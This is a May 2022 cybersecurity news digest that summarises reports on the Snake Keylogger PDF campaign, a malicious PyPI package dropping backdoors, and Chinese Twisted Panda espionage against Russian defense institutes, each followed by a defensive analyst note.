LA-SAFE CYBERDIGEST 05.23.2022

MALWARE | SOCIAL ENGINEERING | RANSOMWARE
Snake Keylogger Spreads Through Malicious PDFs-ThreatPost-05.23.2022
While most malicious e-mail campaigns use Word documents to hide and spread malware, a recently
discovered campaign uses a malicious PDF file and a 22-year-old Office bug to propagate the Snake
Keylogger malware, researchers have found. Attackers target victims with emails that include a PDF
document named “REMMITANCE INVOICE.pdf”—misspelling intended–as attachment. If someone
opens the file, Adobe Reader prompts the user to open a .docx file with a rather curious name, researchers
found. The code eventually decrypts a ciphertext that turns out to be more shellcode, which is then executed
after to lead to an executable called fresh.exe that loads the Snake Keylogger, researchers found.

Analyst Note:
Keylogging (keystroke logging) is the act of recording the keyboard interactions of users. Phishing emails,
trojans, bogus websites, and zero-day exploits are all used to introduce keylogging malware into systems.
Keylogger malware can be detected when systems slow down, processes fail, or strange activity occurs.
Administrators can protect systems by avoiding downloads from unknown files, change passwords, and
enable two-factor authentication when possible.

CYBER CRIME | CYBER DEFENSE | SECURITY BREACH
Malicious PyPI Package Opens Backdoors on Windows, Linux, and Macs -BleepingComputer-05.21.2022
A malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop
Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems. In a report by Ax Sharma,
also a reporter at Bleeping Computer, the researcher explains that the infection begins with the execution
of the ‘setup.py’ script found in the package. This script detects the host operating system and, depending
on whether it is Windows, Linux, or Darwin (macOS), fetches a compatible malicious payload that is executed on the system. Software developers should scrutinize package names and details and double-check
their selection of building blocks when something appears strange.

Analyst Note:
The Python programming language allows you to install packages that can be included in programs to
extend their functionality. The threat actor places malicious code inside a package that can execute with
admin privileges. The malicious code abuses the package manager (‘pip’) which launches the ‘setup.py’
file in Python modules. This allows the malware to perform code execution when the package is installed.
Administrators should analyze their setup files when using any form of programming language or operating
system. Analysis of suspicious functionality packages or setup files may indicate these files are
compromised. This observation technique can assist in keeping systems protected from setup or package
file malware.

CYBER POLICY| CYBER INFRASTRUCTURE | CYBER INITIATIVE
China-linked Twisted Panda Caught Spying on Russian Defense R&D-The Register– 05.20.2022
Chinese cyber spies targeted two Russian defense institutes and possibly another research facility in
Belarus, according to Check Point Research. The new campaign, dubbed Twisted Panda, is part of a larger,
state-sponsored espionage operation that has been ongoing for several months. According to the security
shop. The Spinner backdoor’s main purpose is to run additional payloads sent from a command-and-control
server, although the researchers say they didn’t intercept any of these other payloads. The FBI has warned,
the Chinese government isn’t above using cyberespionage and IP theft to accomplish these goals.

Analyst Note:
Generally, Twisted Panda (Chinese APT) utilized phishing emails with malicious links and attachments.
This APT, like most, will often monitor, intercept, and relay information and sensitive data. These tactics
or exploits common. APTs are constantly attempting to compromise organizations with high value information. In terms of global connectivity, all businesses have high value information, and their files should
be treated as such. Network teams should be cognizant of any suspicious activities they find withing their
networks. Teams should also treat company information as high value needing complete security.